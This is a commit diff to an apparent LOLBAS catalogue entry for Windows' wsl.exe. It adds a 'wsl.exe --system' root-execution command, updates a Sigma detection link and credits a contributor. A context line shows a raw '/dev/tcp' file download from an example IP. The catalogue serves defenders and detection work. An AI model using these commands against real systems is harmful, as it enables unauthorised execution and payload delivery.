Adding and updating various LOLBINS (#229)

Co-authored-by: Wietze <wietze@users.noreply.github.com>

yml/OtherMSBinaries/Wsl.yml

@@ -25,6 +25,13 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10, Windows 19 Server
+  - Command: wsl.exe --system calc.exe
+    Description: Execute the command as root
+    Usecase: Performs execution of arbitrary Linux commands as root without need for password.
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 11
   - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
     Description: Downloads file from 192.168.1.10
     Usecase: Download file
@@ -37,11 +44,12 @@ Full_Path:
 Code_Sample:
   - Code:
 Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_wsl_lolbin.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/2a4e6d8ebeb07d294e6d16a083361bd7e53df7b3/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml
   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
   - IOC: Child process from wsl.exe
 Resources:
   - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+  - Link: https://twitter.com/nas_bench/status/1535431474429808642
 Acknowledgement:
   - Person: Alex Ionescu
     Handle: '@aionescu'
@@ -49,3 +57,5 @@ Acknowledgement:
     Handle: '@NotoriousRebel1'
   - Person: Asif Matadar
     Handle: '@d1r4c'
+  - Person: Nasreddine Bencherchali
+    Handle: '@nas_bench'